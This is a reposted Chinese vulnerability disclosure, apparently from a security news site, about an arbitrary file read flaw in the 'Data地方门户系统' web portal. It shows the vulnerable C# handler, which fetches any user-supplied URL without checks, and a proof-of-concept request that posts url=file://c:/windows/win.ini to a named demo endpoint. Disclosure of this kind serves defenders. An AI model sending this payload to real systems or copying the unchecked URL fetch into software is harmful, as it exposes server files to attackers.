Data地方门户系统 任意文件读取

没穿底裤 2020年1月1日04:56:48评论367 views字数 727阅读2分25秒阅读模式
摘要

地址主要源码如下如果url为file://url 就可以下载任意文件了(登陆可见是小编测试一下功能而已啦~嘿嘿~)


漏洞作者: hello

详细说明:

地址

http://demo.htmdata.com/ashx/GetPage.ashx

 

主要源码如下

public void ProcessRequest(HttpContext context) {     context.Response.ContentType = "text/plain";     string s = "";     string requestUriString = Tool.CStr(context.Request["url"]);     try     {         WebRequest request = WebRequest.Create(requestUriString);         WebResponse response = request.GetResponse();         Stream responseStream = response.GetResponseStream();         using (StreamReader reader = new StreamReader(responseStream, Encoding.UTF8))         {             s = reader.ReadToEnd();         }         request.Abort();         response.Close();         responseStream.Dispose();     }     catch (Exception)     {     }     context.Response.Write(s); }

 

如果url为file://url 就可以下载任意文件了

漏洞证明:

(登陆可见是小编测试一下功能而已啦~嘿嘿~)

[dmengl2v]

漏洞证明

官网

访问
http://demo_htmdata_com/ashx/GetPage.ashx

post提交
url=file://c:/windows/win.ini

Data地方门户系统 任意文件读取

[/dmengl2v]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:56:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Data地方门户系统 任意文件读取http://cn-sec.com/archives/76168.html

发表评论

匿名网友 填写信息